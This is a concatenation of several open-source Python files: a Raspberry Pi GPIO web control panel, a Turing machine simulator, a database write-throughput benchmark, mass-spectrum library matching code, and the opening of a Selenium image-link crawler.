self.pins = pins
def setupPins(self):
self.pi.set_mode(sensor[3], pigpio.INPUT)
self.pi.set_pull_up_down(sensor[3], pigpio.PUD_DOWN)
self.pi.set_mode(output[4], pigpio.OUTPUT)
self.pi.set_mode(sensor[20], pigpio.INPUT)
self.pi.set_pull_up_down(sensor[20], pigpio.PUD_DOWN)
self.pi.set_mode(output[21], pigpio.OUTPUT)
```
#### File: pi-lights/src/web.py
```python
import cherrypy
import json
import os
import pigpio
import time
import commandSend
class ControlPanel(object):
token = '<KEY>'
pi = pigpio.pi()
commands = {}
inputs = {}
outputs = {}
events = {}
def test(self, data):
print('data:', data)
def __init__(self):
self.path = '.'
# setup network
self.cmd = commandSend.CommandSend(
self.token,
url="http://172.16.16.61:8080/"
)
# add test function
self.commandAdd('test', self.test)
# set up input read
wd = cherrypy.process.plugins.BackgroundTask(2, self.inputReads)
wd.start()
def commandAdd(self, command, function):
self.commands[command] = function
print(self.commands)
@cherrypy.expose
def commandReceive(self, key, command, data = ''):
if key != self.token:
print('Error: bad key given')
return
print('Command: ', command, data)
print('Available commands: ', self.commands)
self.commands[command](data)
@cherrypy.expose
def commandSend(self, command, data = ''):
print('Sending command: ', command, data)
self.cmd.send(command, data)
@cherrypy.expose
def index(self):
return self.readFile(self.path + '/html/index.html')
def eventAdd(self, name, sensor, triggers, callback):
self.events[name] = {
'sensor': sensor,
'triggers': triggers,
'callback': callback,
'last_change': time.time(),
'last_state': None,
'executed': False
}
def eventRead(self, name):
event = self.events[name]
state = self.inputs[event['sensor']][1]
last_state = event['last_state']
if state != last_state:
event['last_state'] = state
event['last_change'] = time.time()
event['executed'] = False
self.events[name] = event
# calculate time difference
diff = time.time() - event['last_change']
trigger = event['triggers']
if trigger['state'] != state and trigger['state'] != None:
return
if trigger['diff'] > diff and trigger['diff'] != None:
return
if trigger['run_once'] and event['executed']:
return
# trigger event
self.events[name]['executed'] = True
event['callback']()
def inputAdd(self, name, pin, callback, freq = 1):
print('Input', name)
self.inputs[name] = (pin, 0, callback)
self.pi.set_mode(pin, pigpio.INPUT)
self.pi.set_pull_up_down(pin, pigpio.PUD_DOWN)
def inputRead(self, name):
pin, oldValue, callback = self.inputs[name]
newValue = self.pi.read(pin)
if oldValue != newValue:
callback(newValue)
self.inputs[name] = (pin, newValue, callback)
def inputReads(self):
while True:
time.sleep(0.1)
for item in self.inputs:
self.inputRead(item)
for event in self.events:
self.eventRead(event)
def outputAdd(self, name, pin, value=True):
print('Output', name, value)
self.outputs[name] = (pin, value)
self.pi.set_mode(pin, pigpio.OUTPUT)
self.pi.write(pin, value)
def outputSet(self, name, value):
print('Set output:', name, value)
pin, oldValue = self.outputs[name]
self.outputs[name] = (pin, value)
self.pi.write(pin, value)
def readFile(self, file):
f = open(file, 'r')
return f.read()
def startServer(self, port=8080):
conf = {
'/static': {
'tools.staticdir.root': os.path.abspath(os.getcwd()),
'tools.staticdir.on': True,
'tools.staticdir.dir': self.path + '/html'
}
}
cherrypy.config.update({'server.socket_port': port})
cherrypy.config.update({'server.socket_host': '0.0.0.0'})
cherrypy.quickstart(self, '/', conf)
if __name__ == '__main__':
cp = ControlPanel()
cp.startServer()
``` |
{
"source": "jnwarp/turing",
"score": 4
} |
#### File: jnwarp/turing/turingmachine.py
```python
class TuringMachine:
"""
Turing Machine accepts a tape (string) and transition function.
INPUT:
tape = 'aaa'
transition_function = {
'q0': {
'a': ('q0', 'a', 'R'),
'b': ('q1', 'a', 'R'),
'*': ('qrej', '*', 'L')
},
'q1': {
'a': ('q1', 'b', 'R'),
'b': ('qacc', 'b', 'L'),
'*': ('qrej', '*', 'L')
}
}
SPECIAL STATES:
q0 = initial state
qacc = Accepts the input
qrej = Rejects the input
TRANSITION FUNCTION:
{
state: {
letter: (new_state, write_letter, L/R)
}
}
"""
def __init__(self, tape, transition_function):
# convert tape to list for iteration purposes
self.tape = list(tape)
# save inputs
self.funct = transition_function
self.state = 'q0'
self.q = -1
# print out the initial state
print('state\ttape')
print('='*12)
self.printState()
# start q at zero
self.q = 0
def printState(self, nextpos = 0):
out = ''
for i, q in enumerate(self.tape):
if i == self.q:
# optionally print direction
if nextpos > 0:
out += ' ' + q + '>'
elif nextpos < 0:
out += '<' + q + ' '
else:
out += '[' + q + ']'
else:
out += ' ' + q + ' '
print(self.state + '\t' + out)
def step(self):
# stop if state reaches acc / rej
if self.state == 'qacc':
print('\nState accepted!')
return self.state
elif self.state == 'qrej':
print('\nState rejected!')
return self.state
# select the funct to use
funct = self.funct[self.state][self.tape[self.q]]
# replace the tape element
self.state = funct[0]
self.tape[self.q] = funct[1]
# print state before head is moved
self.printState()
"""
#optionally print direction
if funct[2] == 'R':
self.printState(1)
else:
self.printState(-1)
"""
# move the head
if (funct[2] == 'R'):
self.q += 1
# append element if q goes beyond string
if len(self.tape) <= self.q:
self.tape += '*'
else:
self.q -= 1
# throw error if element tries to go too far
if self.q < 0:
raise ValueError('Out of tape, L\n' + self.tape + ' ' + self.funct)
def stepAll(self, limit=100):
cnt = 0
flag = True
while flag and cnt < limit:
# step one, stop if result
result = t.step()
if (result != None):
flag = False
# prevent inf loop
cnt += 1
if flag:
print('State limit reached!')
return result
def stepPause(self):
flag = True
while flag:
# pause for user to press enter
input('')
# step one, stop if result
result = t.step()
if (result != None):
flag = False
return result
"""
# infinite problem
transition_function = {
'q0': {
'a': ('qr', '*', 'R'),
'*': ('qr', '*', 'R')
},
'qr': {
'a': ('qr', 'a', 'R'),
'*': ('ql', 'a', 'L')
},
'ql': {
'a': ('ql', 'a', 'L'),
'*': ('qr', '*', 'R')
}
}
"""
transition_function = {
'q0': {
'a': ('q0', 'a', 'R'),
'b': ('q1', 'a', 'R'),
'*': ('qrej', '*', 'L')
},
'q1': {
'a': ('q1', 'b', 'R'),
'b': ('qacc', 'b', 'L'),
'*': ('qrej', '*', 'L')
}
}
tape = 'aba*'
t = TuringMachine(tape, transition_function)
t.stepAll()
``` |
{
"source": "jnwatson/synapse-perf",
"score": 3
} |
#### File: synapse-perf/write_test/write_test.py
```python
import time
import os
import struct
import sqlite3
from binascii import hexlify
from typing import Union
import base64
import psutil # type: ignore
import lmdb # type: ignore
from numpy import random # type: ignore
import psycopg2 # type: ignore
import synapse.cortex as s_cortex # type: ignore
_SIZET_ST = struct.Struct('@Q')
class SqliteWriter:
def __init__(self, filename: str, already_exists: bool, use_sqlite_wal: bool) -> None:
self.conn = sqlite3.connect(filename)
if not already_exists:
self.conn.execute('CREATE TABLE t(key INTEGER PRIMARY KEY ASC, val BLOB);')
self.conn.commit()
if use_sqlite_wal:
self.conn.execute('PRAGMA journal_mode=WAL;')
self.label = 'sqlite_wal'
else:
self.label = 'sqlite'
def write(self, data: bytes, batch_size: int) -> None:
self.conn.executemany('INSERT INTO t VALUES (?, ?)',
((_SIZET_ST.unpack(random.bytes(7)+b'\0')[0], data) for j in range(batch_size)))
self.conn.commit()
def close(self):
self.conn.close()
class PostgresqlWriter(SqliteWriter):
def __init__(self, delete_first: bool) -> None:
self.conn = psycopg2.connect("host='localhost' dbname='db' user='synapse' password='<PASSWORD>'")
self.curs = self.conn.cursor()
if delete_first:
self.curs.execute('DROP TABLE IF EXISTS t;')
self.curs.execute('DROP TABLE IF EXISTS synapsetable;')
self.curs.execute('DROP TABLE IF EXISTS synapsetable_blob;')
self.curs.execute('CREATE TABLE t(key BIGINT PRIMARY KEY, val BYTEA);')
self.conn.commit()
self.label = 'postgres'
def write(self, data: bytes, batch_size: int) -> None:
self.curs.executemany('INSERT INTO t VALUES (%s, %s)',
((_SIZET_ST.unpack(random.bytes(7)+b'\0')[0], data) for j in range(batch_size)))
self.conn.commit()
def close(self):
self.curs.close()
self.conn.close()
class LmdbWriter:
def __init__(self, filename: str) -> None:
MAP_SIZE = 20 * 1024 * 1024 * 1024
self.env = lmdb.Environment(filename, map_size=MAP_SIZE, subdir=False, metasync=False, sync=True,
readahead=False, max_dbs=4, writemap=True, meminit=False, lock=True)
self.db = self.env.open_db(key=b'data', integerkey=True)
self.label = 'lmdb'
def write(self, data: bytes, batch_size: int) -> None:
with self.env.begin(write=True, buffers=True, db=self.db) as txn:
for j in range(batch_size):
# rv = txn.put(key_enc, data, dupdata=False, overwrite=False, db=db)
rv = txn.put(random.bytes(8), data, dupdata=False, overwrite=False, db=self.db)
assert rv
def close(self) -> None:
self.env.close()
class SynapseWriter:
def __init__(self, filename: str, *, use_sqlite: bool, use_postgres: bool, delete_first: bool,
use_sqlite_wal=False) -> None:
print(self)
if use_sqlite or use_sqlite_wal:
url = 'sqlite:///' + filename
if use_sqlite_wal:
self.label = 'syn_sqlite_wal'
else:
self.label = 'syn_sqlite'
elif use_postgres:
url = 'postgres://synapse:synapse@localhost/db/synapsetable'
self.label = 'syn_postgres'
if delete_first:
self._drop_synapse_table()
else:
url = 'lmdb:///' + filename
self.label = 'syn_lmdb'
self.core = s_cortex.openurl(url)
if use_sqlite_wal:
db = self.core.store.dbpool.get()
db.execute('PRAGMA journal_mode=WAL;')
self.core.store.dbpool.put(db)
def _drop_synapse_table(self):
conn = psycopg2.connect("host='localhost' dbname='db' user='synapse' password='<PASSWORD>'")
curs = conn.cursor()
curs.execute('DROP TABLE IF EXISTS synapsetable;')
curs.execute('DROP TABLE IF EXISTS synapsetable_blob;')
curs.execute('DROP TABLE IF EXISTS t;')
conn.commit()
curs.close()
conn.close()
def write(self, data: bytes, batch_size: int) -> None:
rows = []
val = base64.a85encode(data).decode('ascii')
prop = 'propname'
for i in range(batch_size):
iden = hexlify(random.bytes(16)).decode('utf8')
timestamp = random.randint(1, 2 ** 63)
rows.append((iden, prop, val, timestamp))
self.core.addRows(rows)
def close(self) -> None:
pass
def make_db(*, size_in_mb: int, delete_first: bool, filename: str, use_sqlite=False, use_postgresql=False,
use_synapse=False, use_sqlite_wal=False):
me = psutil.Process()
if (use_sqlite and use_postgresql) or (use_sqlite_wal and use_postgresql):
raise Exception('Invalid parameters.')
if delete_first and not use_postgresql:
try:
os.unlink(filename)
except OSError:
pass
already_exists = os.path.exists(filename)
else:
already_exists = False
if use_synapse:
writer: Union[SynapseWriter, SqliteWriter, LmdbWriter] = \
SynapseWriter(filename, use_sqlite=use_sqlite, use_sqlite_wal=use_sqlite_wal, use_postgres=use_postgresql,
delete_first=delete_first)
elif use_sqlite:
writer = SqliteWriter(filename, already_exists, use_sqlite_wal=use_sqlite_wal)
elif use_postgresql:
writer = PostgresqlWriter(delete_first)
else:
writer = LmdbWriter(filename)
print("Starting write test for %s" % writer.label)
if already_exists:
print("Using existing DB")
total_size = size_in_mb * 1024 * 1024
DATA_SIZE = 1024
BATCH_SIZE = 128
data = b'\xa5' * DATA_SIZE
key = last_key = first_key = random.randint(0, 2**63-1)
last_now = start_time = time.time()
for i in range(total_size // DATA_SIZE // BATCH_SIZE):
if i % 512 == 0:
print('uss=%dMiB' % (me.memory_full_info().uss // 1024 // 1024))
now = time.time()
if i > 0:
mib = DATA_SIZE * (key - first_key) / 1024 / 1024
mib_s = (DATA_SIZE * (key - last_key) / 1024 / 1024)/(now - last_now)
print('MiB=%.1f, MiB/s=%.3f' % (mib, mib_s))
print('> {"%s": {"mib": %d, "mib_s": %.3f}}' % (writer.label, mib, mib_s))
last_key = key
last_now = now
writer.write(data, BATCH_SIZE)
key += BATCH_SIZE
writer.close()
now = time.time()
mib = DATA_SIZE * (key - first_key) / 1024 / 1024
mib_s = mib/(now - start_time)
print('Cum MiB=%.2f, MiB/s=%.2f' % (mib, mib_s))
print('> {"%s cum": {"mib": %d, "mib_s": %.3f}}' % (writer.label, mib, mib_s))
def main():
parser = argparse.ArgumentParser(description="Write a database")
parser.add_argument("--delete-first", action='store_true')
parser.add_argument("--use-sqlite", action='store_true')
parser.add_argument("--use-sqlite-wal", action='store_true')
parser.add_argument("--use-postgresql", action='store_true')
parser.add_argument("--use-synapse", action='store_true')
parser.add_argument("filename")
parser.add_argument("size_in_mb", type=int)
args = parser.parse_args()
make_db(**vars(args))
if __name__ == '__main__':
import argparse
main()
``` |
{
"source": "jnwei/deep-molecular-massspec",
"score": 2
} |
#### File: jnwei/deep-molecular-massspec/library_matching.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
from os import path
import feature_map_constants as fmap_constants
import mass_spec_constants as ms_constants
import util
import numpy as np
import tensorflow as tf
FP_NAME_FOR_JACCARD_SIMILARITY = str(
ms_constants.CircularFingerprintKey(fmap_constants.CIRCULAR_FP_BASENAME,
1024, 2))
# When filtering the library matching candidates on a per-query basis, we
# set the query-library element similarity to this value for the elements
# that were filtered.
_SIMILARITY_FOR_FILTERED_ELEMENTS = -100000
_KEY_FOR_LIBRARY_VECTORS = fmap_constants.DENSE_MASS_SPEC
def _validate_data_dict(data_dict, name):
if data_dict is None:
return
for key in [
FP_NAME_FOR_JACCARD_SIMILARITY, fmap_constants.INCHIKEY,
_KEY_FOR_LIBRARY_VECTORS, fmap_constants.MOLECULE_WEIGHT
]:
if key not in data_dict:
raise ValueError('input dataset with name %s '
'must have field %s' % (name, key))
class LibraryMatchingData(
namedtuple('LibraryMatchingData', ['observed', 'predicted', 'query'])):
"""Data for library matching evaluation.
All input data dictionaries must have the following keys:
fmap_constants.INCHIKEY, fmap_constants.DENSE_MASS_SPEC,
and all keys in fmap_constants.FINGERPRINT_LIST
Args:
observed: data put into the library using true observed spectra.
predicted: data put into the library using the output of a predictive model
applied to the data's molecules.
query: data containing observed spectra used to issue queries to the
library.
"""
def __new__(cls, observed, predicted, query):
_validate_data_dict(observed, 'observed')
_validate_data_dict(predicted, 'predicted')
_validate_data_dict(query, 'query')
return super(LibraryMatchingData, cls).__new__(cls, observed, predicted,
query)
def _invert_permutation(perm):
"""Convert an array of permutations to an array of inverse permutations.
Args:
perm: a [batch_size, num_iterms] int array where each column is a
permutation.
Returns:
A [batch_size, num_iterms] int array where each column is the
inverse permutation of the corresponding input column.
"""
output = np.empty(shape=perm.shape, dtype=perm.dtype)
output[np.arange(perm.shape[0])[..., np.newaxis], perm] = np.arange(
perm.shape[1])[np.newaxis, ...]
return output
def _find_query_rank_helper(similarities, library_keys, query_keys):
"""Find rank of query key when we sort library_keys by similarities.
Note that the behavior of this function is not well defined when there
are ties along a row of similarities.
Args:
similarities: [batch_size, num_library_elements] float array. These are not
assumed to be sorted in any way.
library_keys: [num_library_elements] string array, where each column j of
similarities corresponds to library_key j.
query_keys: [num_queries] string array.
Returns:
highest_rank: A [batch_size] tf.int32 np array containing
for each batch the highest index of a library key that matches the query
key for that batch element when the library keys are sorted in descending
order by similarity score.
lowest_rank: similar to highest_rank, but the lowest index of a library key
matchign the query.
avg_rank: A [batch_size] tf.float32 array containing the average index
of all library keys matching the query.
best_query_similarities: the value of the similarities evaluated at
the lowest_rank position.
Raises:
ValueError: if there is a query key does not exist in the set of library
keys.
"""
def _masked_rowwise_max(data, mask):
data = np.copy(data)
min_value = np.min(data) - 1
data[~mask] = min_value
return np.max(data, axis=1)
def _masked_rowwise_min(data, mask):
data = np.copy(data)
max_value = np.max(data) + 1
data[~mask] = max_value
return np.min(data, axis=1)
def _masked_rowwise_mean(data, mask):
masked_data = data * mask
rowwise_value_sum = np.float32(np.sum(masked_data, axis=1))
rowwise_count = np.sum(mask, axis=1)
return rowwise_value_sum / rowwise_count
library_key_matches_query = (
library_keys[np.newaxis, ...] == query_keys[..., np.newaxis])
if not np.all(np.any(library_key_matches_query, axis=1)):
raise ValueError('Not all query keys appear in the library.')
ranks = _invert_permutation(np.argsort(-similarities, axis=1))
highest_rank = _masked_rowwise_max(ranks, library_key_matches_query)
lowest_rank = _masked_rowwise_min(ranks, library_key_matches_query)
avg_rank = _masked_rowwise_mean(ranks, library_key_matches_query)
highest_rank = np.int32(highest_rank)
lowest_rank = np.int32(lowest_rank)
avg_rank = np.float32(avg_rank)
best_query_similarities = _masked_rowwise_max(similarities,
library_key_matches_query)
return (highest_rank, lowest_rank, avg_rank, best_query_similarities)
def _find_query_rank(similarities, library_keys, query_keys):
"""tf.py_func wrapper around _find_query_rank_helper.
Args:
similarities: [batch_size, num_library_elements] float Tensor. These are not
assumed to be sorted in any way.
library_keys: [num_library_elements] string Tensor, where each column j of
similarities corresponds to library_key j.
query_keys: [num_queries] string Tensor
Returns:
query_ranks: a dictionary with keys 'highest', 'lowest' and 'avg', where
each value is a [batch_size] Tensor. The 'lowest' Tensor contains
for each batch the lowest index of a library key that matches the query
key for that batch element when the library keys are sorted in descending
order by similarity score. The 'highest' and 'avg'
Tensors are defined similarly. The first two are tf.int32 and the
final is a tf.float32.
Note that the behavior of these metrics is undefined when there are ties
within a row of similarities.
best_query_similarities: the value of the similarities evaluated at
the lowest query rank.
"""
(highest_rank, lowest_rank, avg_rank, best_query_similarities) = tf.py_func(
_find_query_rank_helper, [similarities, library_keys, query_keys],
(tf.int32, tf.int32, tf.float32, tf.float32),
stateful=False)
query_ranks = {
'highest': highest_rank,
'lowest': lowest_rank,
'avg': avg_rank
}
return query_ranks, best_query_similarities
def _max_similarity_match(library,
query,
similarity_provider,
library_filter=None,
library_keys=None,
query_keys=None):
"""Find maximum similarity between query and library vectors.
All queries and library elements are associated with a key. We require that
each query key exists in the library. In other words, the ground truth id
of the query is in the library. We optionally return additional data
about how similar the library element for the ground truth was to the query.
Args:
library: [num_elements, feature_dim] Tensor
query: [num_queries, feature_dim] Tensor
similarity_provider: a similarity.SimilarityProvider instance
library_filter: [num_elements, num_queries] Bool Tensor. Query j is
permitted to be matched to library element i if library_filter[i, j] is
True. Unused if None.
library_keys: tf.string Tensor of the ids of the library elements
query_keys: tf.string Tensor of the ids of the queries
Returns:
argmax: [num_queries] tf.int32 Tensor containing indices of maximum inner
product between each query and the library.
best_similarities: [num_queries] tf.float32 Tensor containing the value of
the maximum inner products.
query_ranks: a dictionary with keys 'highest', 'lowest' and 'avg', where
each value is a [batch_size] Tensor. The 'lowest' Tensor contains
for each batch the lowest index of a library key that matches the query
key for that batch element when the library keys are sorted in descending
order by similarity score. The 'highest' and 'avg'
Tensors are defined similarly. The first two are tf.int32 and the
final is a tf.float32.
Note that the behavior of these metrics is undefined when there are ties
within a row of similarities.
query_similarities: [num_queries] corresponding similarities for the
'lowest' ranks in query_ranks above.
library_entry_of_predictions: [num_queries, feature_dim] Tensor
"""
similarities = similarity_provider.compute_similarity(library, query)
if library_filter is not None:
error_tensors = [
'For some query, all elements of the library were '
'removed by filtering.'
]
if query_keys is not None:
error_tensors.append(query_keys)
assert_op = tf.Assert(
tf.reduce_all(tf.reduce_any(library_filter, axis=0)), error_tensors)
with tf.control_dependencies([assert_op]):
library_filter = tf.transpose(library_filter, (1, 0))
similarities = tf.where(
library_filter, similarities,
_SIMILARITY_FOR_FILTERED_ELEMENTS * tf.ones_like(similarities))
argmax = tf.argmax(similarities, axis=1)
row_indices = tf.range(0, tf.shape(argmax)[0])
argmax_with_indices = tf.stack(
[row_indices, tf.cast(argmax, tf.int32)], axis=1)
best_similarities = tf.gather_nd(similarities, argmax_with_indices)
library_entry_of_prediction = tf.gather(library, argmax)
library_entry_of_prediction = similarity_provider.undo_library_preprocessing(
library_entry_of_prediction)
if library_keys is not None and query_keys is not None:
if library_keys.shape.ndims == 2:
library_keys = tf.squeeze(library_keys, axis=1)
if query_keys.shape.ndims == 2:
query_keys = tf.squeeze(query_keys, axis=1)
query_ranks, query_similarities = _find_query_rank(similarities,
library_keys, query_keys)
else:
query_similarities = None
query_ranks = None
return (argmax, best_similarities, query_ranks, query_similarities,
library_entry_of_prediction)
def _make_library(predicted_dict,
predictor_fn,
observed_dict,
eval_batch_size,
similarity_provider,
name='library'):
"""Make idempotent [num_elements, library_entry_length] library Tensor."""
def _get_library_shape(predicted_dict, observed_library):
"""Infer the shape of the library from the observed and predicted data."""
if observed_library is None:
prediction_shape = util.get_static_shape_without_adding_ops(
predicted_dict, predictor_fn)
library_entry_length = prediction_shape[1]
num_elements_observed = 0
else:
(num_elements_observed,
library_entry_length) = observed_library.shape.as_list()
# Having a statically-inferrable batch size is required, since we need to
# know the exact shape of the constructed library at graph construction
# time, since it will be stored in a tf.Variable.
assert num_elements_observed is not None, ('batch_size must be '
'statically inferrable for '
'the observed data.')
num_elements = num_elements_observed
if predicted_dict is not None:
num_elements_predicted = tf.contrib.framework.nest.flatten(
predicted_dict)[0].shape[0]
assert num_elements_predicted is not None, ('batch_size must be '
'statically inferrable for '
'the predicted data.')
num_elements += num_elements_predicted
return [num_elements, library_entry_length]
if observed_dict is not None:
observed_library = observed_dict[_KEY_FOR_LIBRARY_VECTORS]
else:
observed_library = None
if predicted_dict is not None:
library_shape = _get_library_shape(predicted_dict, observed_library)
# The library may require expensive computation to construct. Therefore
# at evaluation time we do this computation once and cache the result in a
# Variable. The first function below allocates this Variable. The second
# creates the potentially-expensive operation for setting the Variable to
# the desired value.
def make_value_op():
# It's important to use a local variable rather than a global Variable.
# Global variables get restored from checkpoints. This would be bad here,
# since we want to recompute the library with respect to the predictions
# of the current model.
return tf.get_local_variable(
name=name,
shape=library_shape,
dtype=tf.float32,
initializer=tf.zeros_initializer)
def make_init_op(value_op):
prediction = util.map_predictor(
predicted_dict, predictor_fn, sub_batch_size=eval_batch_size)
if observed_dict is not None:
library = tf.concat([prediction, observed_library], axis=0)
else:
library = prediction
normalized_library = similarity_provider.preprocess_library(library)
return value_op.assign(normalized_library)
full_library = util.value_op_with_initializer(make_value_op, make_init_op)
else:
full_library = similarity_provider.preprocess_library(observed_library)
def _get_ids_fingerprints_and_masses(data_dict):
if data_dict is None:
return [], [], []
ids = data_dict[fmap_constants.INCHIKEY]
if ids.shape[0] == 0:
return [], [], []
fingerprints = data_dict[FP_NAME_FOR_JACCARD_SIMILARITY]
masses = tf.squeeze(data_dict[fmap_constants.MOLECULE_WEIGHT], axis=1)
return [ids], [fingerprints], [masses]
(predicted_ids, predicted_fingerprints,
predicted_masses) = _get_ids_fingerprints_and_masses(predicted_dict)
(observed_ids, observed_fingerprints,
observed_masses) = _get_ids_fingerprints_and_masses(observed_dict)
full_library_ids = tf.concat(predicted_ids + observed_ids, axis=0)
full_fingerprints = tf.concat(
predicted_fingerprints + observed_fingerprints, axis=0)
full_masses = tf.concat(predicted_masses + observed_masses, axis=0)
return full_library, full_library_ids, full_fingerprints, full_masses
def library_matching(combined_data,
predictor_fn,
similarity_provider,
mass_tolerance,
eval_batch_size=500):
"""Classify query spectra using a library of observed and predicted spectra.
We first construct a library of spectra by merging a set of observed spectra
with a set of spectra that are generated synthetically using a predictive
model. Each spectrum in the library is associated with a the id of the true
molecule that it is associated with.
Next, we stream over a set of query spectra and compute the cosine similarity
between the each query and each element of the library. For each query, we
output the id of the library spectrum that it is most similar to.
Args:
combined_data: a LibraryMatchingData instance
predictor_fn: a callable that takes such a data dict and returns a predicted
spectrum.
similarity_provider: A similarity.SimilarityProvider instance.
mass_tolerance: library elements are only considered as candidate
matches if their mass is within this much of the query mass. If None,
no filtering is performed.
eval_batch_size: int for the batch size to use when predicting spectra to
include in the library.
Returns:
true_ids: string Tensor containing the ground truth ids for the queries.
predicted_ids: string Tensor contain the ids of the elements of the library
that the queries were matched to.
library_entry_of_prediction: float Tensor containing the library spectra
that is the best match for the query
num_library_elements: int
"""
observed_dict = combined_data.observed
predicted_dict = combined_data.predicted
query_dict = combined_data.query
(full_library, full_library_ids, full_fingerprints,
full_masses) = _make_library(predicted_dict, predictor_fn, observed_dict,
eval_batch_size, similarity_provider)
true_ids = query_dict[fmap_constants.INCHIKEY]
query = similarity_provider.preprocess_queries(
query_dict[fmap_constants.DENSE_MASS_SPEC])
if mass_tolerance is not None:
query_masses = tf.squeeze(
query_dict[fmap_constants.MOLECULE_WEIGHT], axis=1)[tf.newaxis, ...]
full_masses = full_masses[..., tf.newaxis]
library_filter = tf.abs(query_masses - full_masses) <= mass_tolerance
else:
library_filter = None
(library_match_indices, best_similarities, query_ranks,
query_similarities, library_entry_of_prediction) = _max_similarity_match(
full_library, query, similarity_provider, library_filter,
full_library_ids, true_ids)
predicted_ids = tf.gather(full_library_ids, library_match_indices)
true_fingerprints = query_dict[FP_NAME_FOR_JACCARD_SIMILARITY]
predicted_fingerprints = tf.gather(full_fingerprints, library_match_indices)
true_data = {
fmap_constants.INCHIKEY: true_ids,
FP_NAME_FOR_JACCARD_SIMILARITY: true_fingerprints,
'similarity': query_similarities,
'rank': query_ranks
}
predicted_data = {
fmap_constants.INCHIKEY: predicted_ids,
FP_NAME_FOR_JACCARD_SIMILARITY: predicted_fingerprints,
'similarity': best_similarities,
}
num_library_elements = full_library_ids.shape[0].value
return (true_data, predicted_data, library_entry_of_prediction,
num_library_elements)
def _log_predictions(true_keys, predicted_keys, ranks, global_step, log_dir):
output_file = path.join(log_dir,
'%d.library_matching_predictions.txt' % global_step)
with tf.gfile.Open(output_file, 'w') as f:
for true_key, predicted_key, rank in zip(true_keys, predicted_keys, ranks):
f.write('%s %s %d\n' % (true_key[0], predicted_key[0], rank))
return np.int32(0)
def _make_logging_ops(true_keys, predicted_keys, ranks, log_dir):
"""tf.metrics-compatible ops for saving and logging results."""
all_true_keys = []
all_predicted_keys = []
all_ranks = []
def _extend_keys(true_batch_keys, predicted_batch_keys, batch_ranks):
all_true_keys.extend(true_batch_keys)
all_predicted_keys.extend(predicted_batch_keys)
all_ranks.extend(batch_ranks)
return np.int32(0)
update_op = tf.py_func(_extend_keys, [true_keys, predicted_keys, ranks],
[tf.int32])[0]
def _write_log_to_file(global_step):
return _log_predictions(all_true_keys, all_predicted_keys, all_ranks,
global_step, log_dir)
value_op = tf.py_func(_write_log_to_file,
[tf.train.get_or_create_global_step()], [tf.int32])[0]
return (value_op, update_op)
def library_match_accuracy(combined_data,
predictor_fn,
eval_batch_size,
similarity_provider,
mass_tolerance,
log_dir=None):
"""Compute top-1 library matching accuracy.
See library_matching() for details of the library matching process.
Args:
combined_data: a LibraryMatchingData instance
predictor_fn: a callable that takes such a dict and returns a predicted
spectrum.
eval_batch_size: int for the batch size to use when predicting spectra to
include in the library.
similarity_provider: a similarity.SimilarityProvider instance
mass_tolerance: (Float) library elements are only considered as candidate
matches if their mass is within this much of the query mass.
log_dir: (optional) if provided, log predictions here.
Returns:
metrics_dict: A dict where each value is a tuple containing an
Estimator-compatible value_op and update_op.
library_entry_of_prediction: Float tensor of spectra from library which
had the best match for each query spectra
inchikeys: Tensor of strings that are the inchikeys of the spectra in
library_entry_of_prediction.
"""
(true_data, predicted_data,
library_entry_of_prediction, num_library_elements) = library_matching(
combined_data, predictor_fn, similarity_provider, mass_tolerance,
eval_batch_size)
true_inchikeys = true_data[fmap_constants.INCHIKEY]
predicted_inchikeys = predicted_data[fmap_constants.INCHIKEY]
best_query_ranks = true_data['rank']['lowest']
metrics_dict = {}
if log_dir is not None:
metrics_dict['prediction_logging'] = _make_logging_ops(
true_inchikeys, predicted_inchikeys, best_query_ranks, log_dir)
correct_prediction = tf.equal(true_inchikeys, predicted_inchikeys)
metrics_dict['library_matching_accuracy'] = tf.metrics.mean(
correct_prediction)
metrics_dict[
'library_matching_fingerprint_jaccard_similarity'] = tf.metrics.mean_iou(
tf.cast(true_data[FP_NAME_FOR_JACCARD_SIMILARITY] > 0, tf.int32),
tf.cast(predicted_data[FP_NAME_FOR_JACCARD_SIMILARITY] > 0, tf.int32),
2)
metrics_dict['library_match_similarity'] = tf.metrics.mean(
predicted_data['similarity'])
metrics_dict['ground_truth_similarity'] = tf.metrics.mean(
true_data['similarity'])
metrics_dict['average_query_rank'] = tf.metrics.mean(best_query_ranks)
for i in [5, 10, 25, 50, 100]:
metrics_dict['recall@%d' % i] = tf.metrics.mean(best_query_ranks < i)
metrics_dict['mean_reciprocal_rank'] = tf.metrics.mean(
tf.pow(tf.to_float(best_query_ranks) + 1, -1))
avg_query_ranks = true_data['rank']['avg']
metrics_dict['avg-rank-average_query_rank'] = tf.metrics.mean(avg_query_ranks)
num_candidates_with_better_scores = true_data['rank']['lowest']
num_candidates_with_worse_scores = (
num_library_elements - 1 - true_data['rank']['highest'])
num_candidates_with_worse_scores = tf.maximum(
num_candidates_with_worse_scores, 0)
relative_ranking_position = 0.5 * (
1 +
(num_candidates_with_better_scores - num_candidates_with_worse_scores) /
(num_library_elements - 1))
metrics_dict['relative_ranking_position'] = tf.metrics.mean(
relative_ranking_position)
for i in [5, 10, 25, 50, 100]:
metrics_dict['avg-rank-recall@%d' %
i] = tf.metrics.mean(avg_query_ranks < i)
return (metrics_dict, library_entry_of_prediction,
predicted_data[fmap_constants.INCHIKEY])
``` |
{
"source": "jnwnlee/AutoCrawler",
"score": 2
} |
#### File: jnwnlee/AutoCrawler/collect_links.py
```python
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.common.exceptions import ElementNotVisibleException, StaleElementReferenceException
import platform
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.action_chains import ActionChains
from webdriver_manager.chrome import ChromeDriverManager
import os.path as osp
class CollectLinks:
def __init__(self, no_gui=False, proxy=None):
executable = ''
if platform.system() == 'Windows':
print('Detected OS : Windows')
executable = './chromedriver/chromedriver_win.exe'
elif platform.system() == 'Linux':
print('Detected OS : Linux')
executable = './chromedriver/chromedriver_linux'
elif platform.system() == 'Darwin':
print('Detected OS : Mac')
executable = './chromedriver/chromedriver_mac'
else:
raise OSError('Unknown OS Type')
if not osp.exists(executable):
raise FileNotFoundError('Chromedriver file should be placed at {}'.format(executable))
chrome_options = Options()
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-dev-shm-usage')
chrome_options.add_experimental_option('excludeSwitches', ['enable-logging'])
